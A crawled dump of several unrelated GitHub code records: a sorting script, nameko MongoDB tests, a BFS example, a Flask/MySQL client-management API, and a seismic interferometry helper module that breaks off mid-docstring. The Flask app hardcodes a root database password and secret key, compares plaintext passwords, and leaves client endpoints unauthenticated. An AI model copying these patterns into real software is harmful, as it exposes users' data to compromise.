'__main__':\n\tmain()","repo_name":"prashant-977/MachineLearningAssignments","sub_path":"MoviePrediction/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"39008569487","text":"#!/usr/bin/env python3\nimport time\nfrom termcolor import cprint\n\n\ndef insertion_sort(arr):\n global iterations\n\n iterations = 0\n arr = list(arr)\n x = []\n y = arr.copy()\n\n list_index = 0\n for i in range(len(arr)**len(arr)):\n if list_index + 1 == len(arr):\n cprint(\"Search complete\", \"green\")\n break\n\n \n if arr[list_index] > arr[list_index + 1]:\n list_index += 1\n y = list_index\n \n if list_index <= 1:\n\n \n arr[y], arr[y - 1] = arr[y - 1], arr[y]\n iterations += 1\n \n elif list_index > 1:\n \n while arr[y] < arr[y-1]:\n\n arr[y], arr[y-1] = arr[y-1], arr[y]\n iterations += 1\n y -= 1\n if y == 1 and arr[y] < arr[y-1]:\n arr[y], arr[y-1] = arr[y-1], arr[y]\n iterations += 1\n break\n\n\n \n \n elif arr[list_index] < arr[list_index + 1]:\n list_index += 1\n iterations += 1\n \n print(arr)\n cprint(str(iterations) + \" iterations!\", \"red\")\n\n\nlary = input(\"Give a list to be sorted: \")\ninsertion_sort(lary)\n","repo_name":"RitCh123/SortingAlgorithms","sub_path":"insertion_sort.py","file_name":"insertion_sort.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"35515281735","text":"import pytest\nfrom mock import Mock\nfrom nameko.testing.services import dummy, entrypoint_hook\nfrom nameko.containers import ServiceContainer, WorkerContext\nfrom pymongo import MongoClient\nfrom pymongo.database import Database\n\nfrom nameko_mongodb.database import MongoDatabase\n\n\nclass DummyService(object):\n name = 'dummy_service'\n\n database = MongoDatabase()\n\n @dummy\n def insert_one(self, document):\n res = self.database.test_collection.insert_one(document)\n return res\n\n @dummy\n def find_one(self, query):\n doc = self.database.test_collection.find_one(query)\n return doc\n \n @dummy\n def corrupted_method(self):\n return 1/0\n\n\n@pytest.fixture\ndef config(db_url):\n return {\n 'MONGODB_CONNECTION_URL': db_url\n }\n\n\n@pytest.fixture\ndef container(config):\n return Mock(spec=ServiceContainer, config=config, service_name='dummy_service')\n\n\n@pytest.fixture\ndef database(container):\n return MongoDatabase().bind(container, 'database')\n\n\ndef test_setup(database):\n database.setup()\n assert isinstance(database.client, MongoClient)\n assert isinstance(database.database, Database)\n\n\ndef test_stop(database):\n database.setup()\n assert database.client\n\n database.stop()\n assert not hasattr(database, 'client')\n\n\ndef test_get_dependency(database):\n database.setup()\n\n worker_ctx = Mock(spec=WorkerContext)\n db = database.get_dependency(worker_ctx)\n assert isinstance(db, Database)\n\n\ndef test_end_to_end(db_url, container_factory):\n config = {\n 'MONGODB_CONNECTION_URL': db_url\n }\n\n container = container_factory(DummyService, config)\n container.start()\n\n with entrypoint_hook(container, 'insert_one') as insert_one:\n insert_one({'toto': 'titi'})\n\n with entrypoint_hook(container, 'find_one') as find_one:\n doc = find_one({'toto': 'titi'})\n assert doc['toto'] == 'titi'\n \n with entrypoint_hook(container, 'corrupted_method') as corrupted_method:\n try:\n corrupted_method()\n except:\n pass\n\n client = MongoClient(config['MONGODB_CONNECTION_URL'])\n db = client.dummy_service\n logs = db.logging.find({})\n\n for r in logs:\n if r['method_name'] == 'find_one':\n assert r['status'] == 'SUCCESS'\n elif r['method_name'] == 'insert_one':\n assert r['status'] == 'SUCCESS'\n elif r['method_name'] == 'corrupted_method':\n assert r['status'] == 'FAILED'\n assert r['exception']\n","repo_name":"saiqi/nameko-mongodb","sub_path":"tests/test_nameko_mongodb.py","file_name":"test_nameko_mongodb.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"350184056","text":"from collections import deque\n\nclass Graph:\n def __init__(self, edges, n):\n self.adjList = [[] for _ in range(n)]\n\n for (src, dest) in edges:\n self.adjList[src].append(dest)\n self.adjList[dest].append(src)\n\n\ndef BFS(graph, v, discovered):\n q = deque()\n q.append(v)\n\n discovered[v] = True\n\n while q:\n v = q.popleft()\n print(v, end=\" \")\n\n for edges in graph.adjList[v]:\n if not discovered[edges]:\n q.append(edges)\n discovered[edges] = True\n \n\n\n\nif __name__ == '__main__':\n edges = [\n (1, 2), (1, 3), (1, 4), (2, 5), (2, 6), (5, 9),\n (5, 10), (4, 7), (4, 8), (7, 11), (7, 12)\n ]\n\n n = 15\n\n discovered = [False] * n \n graph = Graph(edges, n)\n\n for i in range(n):\n if not discovered[i]:\n BFS(graph, i, discovered)","repo_name":"sasori-s/Problem-Solving-2023","sub_path":"TechieDelight/Graphs/3_bfs.py","file_name":"3_bfs.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"5272208867","text":"from flask import Flask\nfrom flask import request, jsonify, session\nfrom flaskext.mysql import MySQL\nfrom flask_login import login_required\nfrom flask_cors import CORS\n\n\napp=Flask(__name__)\nCORS(app)\nmysql = MySQL()\napp.config['MYSQL_DATABASE_HOST'] = 'localhost'\napp.config['MYSQL_DATABASE_USER'] = 'root'\napp.config['MYSQL_DATABASE_PASSWORD'] = '261093'\napp.config['MYSQL_DATABASE_DB'] = 'gestion_isp'\nmysql.init_app(app)\napp.secret_key = 'mysecretkey'\n\n@app.route('/login', methods=['POST'])\ndef login():\n username = request.json['username']\n password = request.json['password']\n \n conn = mysql.connect()\n cursor = conn.cursor()\n \n cursor.execute('SELECT * FROM usuario WHERE usuario=%s AND contrasenia=%s', (username, password))\n user = cursor.fetchone()\n \n conn.close()\n \n if user:\n session['username'] = username\n return jsonify({'message': 'Inicio de sesión exitoso'})\n else:\n return jsonify({'error': 'Credenciales inválidas'})\n\n\n@app.route('/clientes')\ndef index():\n sql = \"SELECT idcliente, dni, apellido, nombre FROM cliente\"\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(sql)\n empleados = cursor.fetchall()\n conn.commit()\n empleados_dict = []\n for empleado in empleados:\n empleado_dict = {\n 'idcliente': empleado[0],\n 'dni': empleado[1],\n 'apellido': empleado[2],\n 'nombre': empleado[3]\n }\n empleados_dict.append(empleado_dict)\n return jsonify(empleados_dict)\n\n@app.route('/clientesTotal')\ndef clientes():\n sql = \"SELECT * FROM cliente\"\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(sql)\n empleados = cursor.fetchall()\n conn.commit()\n empleados_dict = []\n for empleado in empleados:\n empleado_dict = {\n 'idcliente': empleado[0],\n 'dni': empleado[1],\n 'apellido': empleado[2],\n 'nombre': empleado[3],\n 'direccion': empleado[4],\n 'telefono': empleado[5],\n 'estado': empleado[6],\n 'observaciones': empleado[7],\n 'fechaAlta': empleado[8],\n 'servicio': empleado[10],\n 'zona': empleado[10]\n }\n empleados_dict.append(empleado_dict)\n return jsonify(empleados_dict)\n\n@app.route(\"/guardarCliente\", methods=[\"POST\"])\ndef guardar():\n data = request.get_json()\n dni = data.get(\"dni\")\n apellido = data.get(\"apellido\")\n nombre = data.get(\"nombre\")\n direccion = data.get(\"direccion\")\n telefono = data.get(\"telefono\")\n estado = data.get(\"estado\")\n observaciones = data.get(\"observaciones\")\n idServicio = data.get(\"idServicio\")\n idZona = data.get(\"zona\")\n sql = \"INSERT INTO cliente (DNI, apellido, nombre, direccion, telefono, estado, observaciones, FechaAlta, idServicio, idZona) VALUES (%s, %s, %s, %s, %s, %s, %s, CURDATE(), %s, %s);\"\n values = (dni, apellido, nombre, direccion, telefono, estado, observaciones, idServicio, idZona)\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(sql, values)\n conn.commit()\n\n return \"Cliente guardado exitosamente\"\n\n\n@app.route(\"/editarCliente/<int:idCliente>\", methods=[\"PUT\"])\ndef editar_cliente(idCliente):\n data = request.get_json()\n dni = data.get(\"dni\")\n apellido = data.get(\"apellido\")\n nombre = data.get(\"nombre\")\n direccion = data.get(\"direccion\")\n telefono = data.get(\"telefono\")\n observaciones = data.get(\"observaciones\")\n idServicio = data.get(\"idServicio\")\n idZona = data.get(\"zona\")\n\n sql = \"UPDATE cliente SET dni = %s, apellido = %s, nombre = %s, direccion = %s, telefono = %s, observaciones = %s, idServicio = %s, idZona = %s WHERE idCliente = %s\"\n values = (dni, apellido, nombre, direccion, telefono, observaciones, idServicio, idZona, idCliente)\n\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(sql, values)\n conn.commit()\n\n return \"Cliente actualizado exitosamente\"\n\n\n@app.route(\"/actualizarEstado/<int:idCliente>\", methods=[\"PUT\"])\ndef editarEstado(idCliente):\n data = request.get_json()\n estado = data.get(\"estado\")\n\n sql = \"UPDATE cliente SET estado = %s WHERE idCliente = %s\"\n values = (estado, idCliente)\n\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(sql, values)\n conn.commit()\n\n return \"Cliente actualizado exitosamente\"\n\n@app.route('/generarDeuda', methods=['POST'])\ndef generar_deuda():\n # Realizar la llamada al procedimiento almacenado\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.callproc('GenerarDeuda')\n conn.commit()\n conn.close()\n return jsonify({'message': 'Deuda generada exitosamente'})\n\n\n@app.route('/clienteDeuda/<int:idCliente>', methods=['GET'])\ndef obtener_deuda_cliente(idCliente):\n sql = \"SELECT c.idcliente, d.iddeuda, monto, d.mes FROM clientedeuda c INNER JOIN deuda d ON c.iddeuda = d.iddeuda WHERE c.idcliente = %s\"\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(sql, (idCliente,))\n clientes_deuda = cursor.fetchall()\n conn.commit()\n\n clientes_dict = []\n for cliente_deuda in clientes_deuda:\n cliente_dict = {\n 'idcliente': cliente_deuda[0],\n 'iddeuda': cliente_deuda[1],\n 'monto': cliente_deuda[2],\n 'mes': cliente_deuda[3]\n }\n clientes_dict.append(cliente_dict)\n\n return jsonify(clientes_dict)\n\n\nif __name__ == \"__main__\":\n app.run()","repo_name":"JuanCruz2693/ProyectoFinal","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5500,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"27853435484","text":"import glob\r\nimport os\r\nimport numpy as np\r\nimport obspy\r\nfrom os.path import join\r\nfrom scipy.signal import convolve2d\r\nfrom thesis_functions.util import cross_corr, stream_to_array\r\nfrom thesis_functions.coord import Coords, correct_slowness\r\nfrom thesis_functions.filt import apply_filters\r\n\r\ndef extract_results(path, master_trace, component, path_info, added_string=''):\r\n \"\"\"\r\n Extract the results of the illumination analysis from the output .txt files.\r\n \r\n\r\n Parameters\r\n ----------\r\n path : str\r\n Path to the .txt files.\r\n master_trace : str\r\n Station number of the station used as master station for the \r\n illumination analysis.\r\n component : str\r\n Which component is used for the illumination analysis.\r\n added_string : str, optional\r\n Possible added string for the illumination analysis. Used for the \r\n second filter as ' - filtered'. The default is ''.\r\n\r\n Returns\r\n -------\r\n start_time : np.ndarray\r\n Array with start times of each noise panel. Can be interpreted by\r\n obspy.core.UTCDateTime()\r\n end_time : np.ndarray\r\n Array with the end times of each noise panel. Can be interpreted by \r\n obspy.core.UTCDateTime()\r\n dom_slow0 : np.ndarray\r\n Array containing the dominant slowness found for each panel along line\r\n 0.\r\n dom_slow1 : np.ndarray\r\n Array containing the dominant slowness found for each panel along line\r\n 1.\r\n\r\n \"\"\"\r\n \r\n # Get a list of all of the output files\r\n output_files = glob.glob(join(path,f\"Log day * - master {master_trace}{component}{added_string}.txt\"))\r\n \r\n # Initiate lists for all of the relevant information\r\n start_time = []\r\n end_time = []\r\n dom_slow0 = []\r\n dom_slow1 = []\r\n \r\n # Go over each file\r\n for output_file in output_files:\r\n # Get all of the lines from th file\r\n file = open(output_file, 'r')\r\n lines = file.readlines()[1:]\r\n file.close()\r\n \r\n # If there is only a header in the file, a string is returned,\r\n # in that case there were no results for the day, so continue\r\n if isinstance(lines,str):\r\n continue\r\n \r\n # Now go over the lines and extract the relevant information\r\n for line in lines:\r\n start, end, master, slow0, slow1 = line.split(',')\r\n start_time.append(start)\r\n end_time.append(end)\r\n dom_slow0.append(slow0)\r\n dom_slow1.append(slow1)\r\n \r\n # Convert the lists to arrays\r\n start_time = np.array(start_time)\r\n end_time = np.array(end_time)\r\n dom_slow0 = np.array(dom_slow0, dtype=float)\r\n dom_slow1 = np.array(dom_slow1, dtype=float)\r\n \r\n # Correct for the angle between the lines\r\n dom_slow = correct_slowness(dom_slow0, dom_slow1, path_info)\r\n # And separate the output again\r\n dom_slow0, dom_slow1 = dom_slow[:,0], dom_slow[:,1]\r\n \r\n return start_time, end_time, dom_slow0, dom_slow1\r\n\r\ndef convert_date(times, method):\r\n \"\"\"\r\n Convert the date format from the string given from the illumination analysis\r\n to different date objects. Options are:\r\n plt:\r\n Matplotlib date\r\n obspy:\r\n Obspy UTCDateTime object\r\n\r\n Parameters\r\n ----------\r\n times : np.ndarray\r\n Array containing the date strings to be converted.\r\n method : str\r\n String indicating the format to convert to. Can be 'plt' for \r\n matplotlib or 'obspy' for a UTCDateTime object.\r\n\r\n Returns\r\n -------\r\n np.ndarray\r\n Array containing the times in the new form.\r\n\r\n \"\"\"\r\n new_times = []\r\n for time in times:\r\n if method == 'plt':\r\n new_times.append(obspy.UTCDateTime(time).matplotlib_date)\r\n elif method == 'obspy':\r\n new_times.append(obspy.UTCDateTime(time))\r\n return np.array(new_times)\r\n\r\ndef select_panels(dom_slow0, dom_slow1, vel_cut, method = 'per_line'):\r\n \"\"\"\r\n Gives a mask to select all panels where the dominant slowness for both\r\n lines is lower than the reciprocal of a selected velocity.\r\n\r\n Parameters\r\n ----------\r\n dom_slow0 : np.ndarray\r\n Array containing the dominant slownesses for line 0. It is assumed to\r\n have the same shape and ordering as dom_slow1\r\n dom_slow1 : np.ndarray\r\n Similar to dom_slow0, but for line 1.\r\n vel_cut : float\r\n Dominant slownesses are tested to be below 1/vel_cut.\r\n\r\n Returns\r\n -------\r\n np.ndarray\r\n Returns mask (array with booleans) for the locations where the conditions\r\n are met.\r\n\r\n \"\"\"\r\n \r\n if method == 'per_line':\r\n # Test for both lines\r\n test0 = abs(dom_slow0) <= 1/vel_cut\r\n test1 = abs(dom_slow1) <= 1/vel_cut\r\n # And give back the places where both are selected.\r\n return np.logical_and(test0, test1)\r\n elif method == 'length':\r\n veclen = np.linalg.norm([dom_slow0,dom_slow1],axis=0)\r\n \r\n return veclen <= 1/vel_cut\r\n\r\ndef date_from_filename(filename):\r\n \"\"\"\r\n Gives an obspy UTCDateTime object from the filename of an output file.\r\n\r\n Parameters\r\n ----------\r\n filename : str\r\n The string containing the filename that was output from the illumination\r\n analysis.\r\n\r\n Returns\r\n -------\r\n obspy UTCDateTime\r\n The time contained in the filname as UTCDateTime object.\r\n\r\n \"\"\"\r\n return obspy.core.UTCDateTime(\"%s-%s-%sT%s:%s:%s\"%tuple(filename.split('.')[:-2]))\r\n\r\ndef times_mask(times, filename, chunk_len=30*60):\r\n \"\"\"\r\n When given the filename of a chunk of data, this function provides a mask\r\n for times that indicates which timestamps are represented in the data file\r\n\r\n Parameters\r\n ----------\r\n times : np.ndarray\r\n Array containing the time stamps.\r\n filename : str\r\n Name of the data file.\r\n chunk_len : float, optional\r\n Length of each data file in seconds. The default is 30*60.\r\n\r\n Returns\r\n -------\r\n mask : np.ndarray\r\n Boolean array that indicates which times in times are included in the\r\n timeframe of the data file.\r\n\r\n \"\"\"\r\n # Find the start and end times of the chunk\r\n start_chunk = date_from_filename(filename)\r\n end_chunk = start_chunk + chunk_len\r\n \r\n # Select the times that fit in this chunk\r\n mask = np.logical_and(times >= start_chunk, times < end_chunk)\r\n return mask\r\n\r\ndef find_times_in_chunk(times, filename, chunk_len = 30*60):\r\n \"\"\"\r\n Given a filename and a list of times, finds the times contained in that \r\n file and returns them. \r\n\r\n Parameters\r\n ----------\r\n times : np.ndarray\r\n Array with times as obspy UTCDateTime object or matplotlib date.\r\n filename : str\r\n The filename of the data chunk that is analysed.\r\n chunk_len : float, optional\r\n The length of the chunk in seconds. Default is the default value from\r\n the illumination analysis.\r\n \r\n Returns\r\n -------\r\n np.ndarray\r\n Array with times as the same type as the input, sliced to only contain\r\n times fitting in the chunk.\r\n\r\n \"\"\"\r\n mask = times_mask(times, filename, chunk_len)\r\n return times[mask]\r\n\r\ndef get_panel(record, times, window_length = 10.):\r\n \"\"\"\r\n Generator function that gives each selected time panel in a time section.\r\n Length of the panel can be adjusted.\r\n\r\n Parameters\r\n ----------\r\n record : obspy Stream\r\n A stream object containing the data.\r\n times : np.ndarray\r\n Array containing the times as obspy UTCDateTime objects that should be \r\n cut from the data. The time is the start of the new panel.\r\n window_length : float, optional\r\n Length of the panels that are cut from the data. The default is 10.\r\n\r\n Yields\r\n ------\r\n obspy Stream\r\n New stream object cut to the desired time and length.\r\n\r\n \"\"\"\r\n for time in times:\r\n yield record.slice(time, time+window_length)\r\n\r\ndef autocorr_panel(record):\r\n \"\"\"\r\n Autocorrelate all of the traces in a section. Only positive times are taken\r\n from the correlation, so that t0 from the autocorrelation is at the original\r\n start time of the section.\r\n\r\n Parameters\r\n ----------\r\n record : obspy Stream\r\n Original section.\r\n\r\n Returns\r\n -------\r\n record_corr : obspy Stream\r\n Autocorrelated section.\r\n\r\n \"\"\"\r\n # Create a new stream\r\n record_corr = obspy.Stream()\r\n \r\n # Go over all of the traces\r\n for trace in record:\r\n # Correlate the trace with itself\r\n trace_corr = cross_corr(trace, trace)\r\n \r\n # Only take positive times\r\n trace_corr.data = trace_corr.data[int((trace_corr.stats.npts - 1) / 2):]\r\n \r\n # Add it to the stream\r\n record_corr += trace_corr\r\n \r\n return record_corr\r\n\r\ndef recreate_stream(section, record, line, dist_tr, path_info):\r\n \"\"\"\r\n Recreate a stream after autocorrelating data. Copies different characteristics\r\n over from original Stream\r\n\r\n Parameters\r\n ----------\r\n section : np.ndarray\r\n Array containing the autocorrelated data.\r\n record : obspy Stream\r\n The stream to copy the information from.\r\n line : str\r\n Which line is being processed.\r\n path_info : str or path\r\n Path to the coordinate information.\r\n\r\n Returns\r\n -------\r\n section_stream : obspy Stream\r\n .\r\n\r\n \"\"\"\r\n # Set up coordinate information\r\n crd = Coords(path_info)\r\n \r\n # Select the right line for the data\r\n rec = crd.line_stream(record)\r\n # rec = select_line(record, line, path_info)\r\n \r\n # Create a new stream\r\n section_stream = obspy.Stream()\r\n \r\n # Go over each trace\r\n for i in range(section.shape[0]):\r\n # Create a new trace\r\n trace = obspy.Trace()\r\n # Add the data and extra information\r\n trace.data = section[i,:]\r\n trace.stats.station = rec[i].stats.station\r\n trace.stats.sampling_rate = rec[i].stats.sampling_rate\r\n trace.stats.starttime = rec[i].stats.starttime\r\n trace.stats.channel = rec[i].stats.channel\r\n \r\n # Add the trace to the stream\r\n section_stream += trace\r\n \r\n section_stream = crd.attach_distances(section_stream, line, mtr_idx = dist_tr)\r\n # section_stream = attach_distances(section_stream, dist_tr, line, path_info)\r\n return section_stream\r\n\r\ndef recreate_stream_NMO(new_data,record):\r\n \"\"\"\r\n An adapted version of recreate stream for NMO corrected CMP gathers. \r\n\r\n Parameters\r\n ----------\r\n new_data : np.ndarray\r\n Array containing the new data that should be fit in a stream.\r\n record : obspy.core.stream.Stream\r\n Stream which serves as the example. Most data is copied over\r\n\r\n Returns\r\n -------\r\n record_shift : obspy.core.stream.Stream\r\n A stream containing the data of new_data.\r\n\r\n \"\"\"\r\n # XXX Can probably be merged with recreate_stream\r\n record_shift = obspy.Stream()\r\n \r\n # Go over each trace\r\n for i in range(new_data.shape[1]):\r\n # Create a new trace\r\n trace = obspy.Trace()\r\n # Add the data and extra information\r\n trace.data = new_data[:,i]\r\n trace.stats.station = record[i].stats.station\r\n trace.stats.sampling_rate = record[i].stats.sampling_rate\r\n trace.stats.starttime = record[i].stats.starttime\r\n trace.stats.channel = record[i].stats.channel\r\n trace.stats.distance = record[i].stats.distance\r\n \r\n # Add the trace to the stream\r\n record_shift += trace\r\n \r\n return record_shift\r\n\r\ndef normalise_section(record):\r\n \"\"\"\r\n Normalise each trace in a section by dividing each trace by its root-mean-\r\n square value. Traces with no data are left as is\r\n\r\n Parameters\r\n ----------\r\n record : obspy.core.stream.Stream\r\n Record that must be normalised.\r\n\r\n Returns\r\n -------\r\n new_record : obspy.core.stream.Stream\r\n Normalised record.\r\n\r\n \"\"\"\r\n \r\n # Initialise a new record\r\n new_record = record.copy()\r\n \r\n data = stream_to_array(new_record)\r\n \r\n # Calculate the rms of the trace. A trace with no data is just divided by 1\r\n squares = np.square(data)\r\n mean_squares = np.mean(squares, axis=1)\r\n mean_squares[mean_squares == 0] = 1.\r\n root_mean_squares = np.sqrt(mean_squares)\r\n \r\n # Divide each trace by its rms\r\n new_data = data / root_mean_squares[:,np.newaxis]\r\n \r\n # Add the new data to the stream\r\n for i,trace in enumerate(new_record):\r\n trace.data = new_data[i,:]\r\n return new_record\r\n\r\ndef normalise_trace(trace):\r\n \"\"\"\r\n Normalise a single trace by dividing it by its root-mean-square value. A\r\n trace with no data is not changed.\r\n\r\n Parameters\r\n ----------\r\n trace : obspy.core.trace.Trace\r\n Trace that must be normalised.\r\n\r\n Returns\r\n -------\r\n obspy.core.trace.Trace\r\n Normalised trace.\r\n\r\n \"\"\"\r\n # Create a new trace\r\n new_trace = obspy.Trace()\r\n\r\n # If all of the data are zeroes, just return the original to prevent\r\n # a divide by zero\r\n if np.all(trace.data == 0.):\r\n return trace\r\n \r\n # Calculate the rms of the trace\r\n squares = np.square(trace.data)\r\n mean_squares = np.mean(squares)\r\n if mean_squares == 0.:\r\n # If the trace contains no data, the trace itself is returned\r\n return trace\r\n root_mean_squares = np.sqrt(mean_squares)\r\n \r\n # Divide the data by the rms\r\n new_trace.data = trace.data / root_mean_squares\r\n new_trace.stats = trace.stats\r\n return new_trace\r\n\r\ndef autocorr_section(path_base, \r\n path_saved, \r\n path_info, \r\n mtr_station, \r\n component, \r\n window_length, \r\n vel_cut, \r\n added_string = '', \r\n print_progress=True, \r\n sel_method = 'per_line'):\r\n \"\"\"\r\n Function that handles generating an autocorrelated section from the results\r\n of illumination analysis. \r\n\r\n Parameters\r\n ----------\r\n path_base : str or path\r\n Path to the location of the raw data.\r\n path_saved : str or path\r\n Path to the results of the illumination analysis.\r\n path_info : str or path\r\n Path to coordinate information, see thesis_function.coord.read_coords\r\n mtr_station : str\r\n The station number of the master trace used for the illumination analysis.\r\n component : str\r\n Component for which the section is generated.\r\n window_length : float\r\n Window length used for the panels of the autocorrelation.\r\n vel_cut : float\r\n Minimum dominant velocity to use to select the panels.\r\n print_progress : bool, optional\r\n Whether or not to print the progress of calculations. The default is True.\r\n\r\n Returns\r\n -------\r\n section0 : Stream\r\n Stream containing the autocorrelations for line 0.\r\n section1 : Stream\r\n Stream containing the autocorrelations for line 1.\r\n\r\n \"\"\"\r\n # Get the results from the illumination analysis\r\n start_time, __, dom_slow0, dom_slow1 = extract_results(path_saved, mtr_station, component, path_info, added_string)\r\n \r\n # Select the times when the events come in roughly vertical\r\n mask = select_panels(dom_slow0, dom_slow1, vel_cut, method=sel_method)\r\n \r\n times_sel = start_time[mask]\r\n \r\n # Set up coordinate info\r\n crd = Coords(path_info)\r\n \r\n # Convert the times to obspy UTCDateTime objects and open the line numbers\r\n times_sel = convert_date(times_sel, 'obspy')\r\n line_id = crd.line_id\r\n \r\n # Now go over all files with raw data\r\n folder_list = glob.glob(os.path.join(path_base,'*'))\r\n \r\n # Read one file to get some information\r\n record = obspy.read(glob.glob(os.path.join(path_base,'*','*.mseed'))[0])\r\n # Initialise the autocorrelated sections\r\n section_l0 = np.zeros([np.sum(line_id == 0.), int(window_length*record[0].stats.sampling_rate + 1)])\r\n section_l1 = np.zeros([np.sum(line_id == 1.), int(window_length*record[0].stats.sampling_rate + 1)])\r\n \r\n # Go over all of the folders\r\n for i,folder in enumerate(folder_list):\r\n # See all the files in this folder\r\n file_list = glob.glob(os.path.join(folder,f'*.{component}.mseed'))\r\n \r\n # Go over all of the files\r\n for j,file in enumerate(file_list):\r\n # See which of the selected times fits in this chunk\r\n times_chunk = find_times_in_chunk(times_sel,os.path.split(file)[-1])\r\n \r\n if print_progress:\r\n print(f'\\r{i}/{len(folder_list)}\\t[{j}/{len(file_list)}]\\tOpening file... ', end='')\r\n \r\n # If there are not times selected, skip this file\r\n if len(times_chunk) == 0:\r\n continue\r\n \r\n # Otherwise read in the file\r\n record = obspy.read(file)\r\n \r\n # Go over all of the panels in the file\r\n for k,panel in enumerate(get_panel(record, times_chunk)):\r\n if print_progress:\r\n print(f'\\r{i}/{len(folder_list)}\\t[{j}/{len(file_list)}]\\t[{k}/{len(times_chunk)}]\\tAdding panels...', end='')\r\n \r\n # Filter the data\r\n panel = apply_filters(panel)\r\n \r\n # Normalise each trace against itself\r\n panel = normalise_section(panel)\r\n \r\n # Autocorrelate it\r\n auto_corr = autocorr_panel(panel)\r\n \r\n # And add the data of this panel to the total\r\n section_l0 += stream_to_array(crd.line_stream(auto_corr, 0))\r\n section_l1 += stream_to_array(crd.line_stream(auto_corr, 1))\r\n # section_l0 += np.array(select_line(auto_corr, '0', path_info))\r\n # section_l1 += np.array(select_line(auto_corr, '1', path_info))\r\n \r\n if print_progress:\r\n print(f'\\r{i+1}/{len(folder_list)}\\t[{j+1}/{len(file_list)}]\\t\\t\\t\\t', end = '')\r\n \r\n # In the end, add all of the other data to create a stream\r\n section0 = recreate_stream(section_l0, record, '0', 27, path_info)\r\n section1 = recreate_stream(section_l1, record, '1', 36, path_info)\r\n \r\n return section0, section1\r\n\r\ndef flip_shot(virt_rec,dom_slow):\r\n \"\"\"\r\n Function applying the TRBI principle as described in the main text of the\r\n thesis. Depending on the direction that the main event in each panel \r\n arrived from, the causal or acausal part of the crosscorrelation is taken. \r\n For panels characterised with a positive slowness, the receiver locations\r\n that have a positive distance (higher along the line) use the causal part.\r\n Vice versa, the receiver locations with a negative distance use the time-\r\n reversed acausal part. This is flipped for negative slowness.\r\n\r\n Parameters\r\n ----------\r\n virt_rec : obspy.stream.Stream\r\n The crosscorrelated panel with the distance to the virtual shot \r\n location attached as trace.stats.distance. Distances upslope should be\r\n higher.\r\n dom_slow : float\r\n The dominant slowness of the panel.\r\n\r\n Returns\r\n -------\r\n data : np.ndarray\r\n The crosscorrelated panel with TRBI applied. Should look like the \r\n causal part of a crosscorrelation\r\n\r\n \"\"\"\r\n # Initialise arrays for the new data and the distances\r\n data = np.zeros([len(virt_rec), int((virt_rec[0].stats.npts-1)/2+1)])\r\n dists = np.zeros(len(virt_rec))\r\n \r\n # Determine the sign of the slowness\r\n direction = dom_slow/abs(dom_slow)\r\n \r\n # Get the distance to the virtual shot location for each receiver\r\n for i,trace in enumerate(virt_rec):\r\n dists[i] = trace.stats.distance\r\n \r\n raw_data = stream_to_array(virt_rec)\r\n # Now take the causal or time-reversed acausal part depending on the sign\r\n # of the slowness and the relative position of the receiver to the virtual\r\n # shot location\r\n data[dists*direction>=0.,:] = raw_data[dists*direction>=0.,int((virt_rec[0].stats.npts-1)/2):]\r\n data[dists*direction<0.,:] = raw_data[dists*direction<0.,:int((virt_rec[0].stats.npts-1)/2+1)][:,::-1]\r\n \r\n return data\r\n\r\ndef convert_shotdata(virt_shots,record,line,path_info):\r\n \"\"\"\r\n Convert raw virtual shot gathers to streams so that they can be \r\n manipulated/saved. The information for the stream comes from record.\r\n\r\n Parameters\r\n ----------\r\n virt_shots : list\r\n List containing all np.ndarrays with the raw virtual shot data.\r\n record : obspy.core.stream.Stream\r\n Stream containing the relevant information for each virtual shot stream\r\n line : str\r\n Identifier for the line of the virtual shot gather.\r\n path_info : str\r\n Path to coordinate information.\r\n\r\n Returns\r\n -------\r\n streams : list\r\n List containing a stream for every virtual shot gather provided.\r\n\r\n \"\"\"\r\n streams = []\r\n \r\n # Go over each virtual shot location\r\n for i in range(len(virt_shots)):\r\n # and use recreate_stream to get the streams back\r\n streams.append(recreate_stream(virt_shots[i,...],record,line,i,path_info))\r\n return streams\r\n\r\ndef save_shotdata(path_save,shots,line,min_vel):\r\n \"\"\"\r\n Function that saves virtual shot gathers as streams as .mseed files.\r\n\r\n Parameters\r\n ----------\r\n path_save : str\r\n The location to save each virtual shot gather to. A subfolder for the\r\n specific line is created if it not already exists\r\n shots : list\r\n List containing the streams that must be saved.\r\n line : str\r\n The line on which the virtual shot gathers are located.\r\n min_vel : float\r\n The minimum velocity used to select panels for the virtual shot gathers\r\n\r\n Returns\r\n -------\r\n None.\r\n\r\n \"\"\"\r\n # Create the path where the .mseed files are saved\r\n new_path = os.path.join(path_save,'Crosscorr '+str(int(min_vel)),line)\r\n\r\n # If this folder does not exist yet, create a folder\r\n if not os.path.isdir(os.path.dirname(new_path)):\r\n os.mkdir(os.path.dirname(new_path))\r\n\r\n # Go over each stream\r\n for i,stream in enumerate(shots):\r\n # Generate a filename for the stream\r\n filename = f'Line {line} - shot {stream[i].stats.station[1:]}.mseed'\r\n \r\n try:\r\n # Write the stream to a file\r\n stream.write(os.path.join(new_path,filename))\r\n except FileNotFoundError:\r\n # XXX For some reason, repeat making the folder if the writing fails\r\n os.mkdir(new_path)\r\n stream.write(os.path.join(new_path,filename))\r\n\r\ndef crosscorr_section(path_base,path_saved,path_info,mtr_station,component,window_length,vel_cut,print_progress=True, return_stream=None, method='per_line'):\r\n \"\"\"\r\n A function that creates virtual shot gathers from selected noise panels.\r\n Because the function is too slow, it was parallelised, for that we refer\r\n to the file 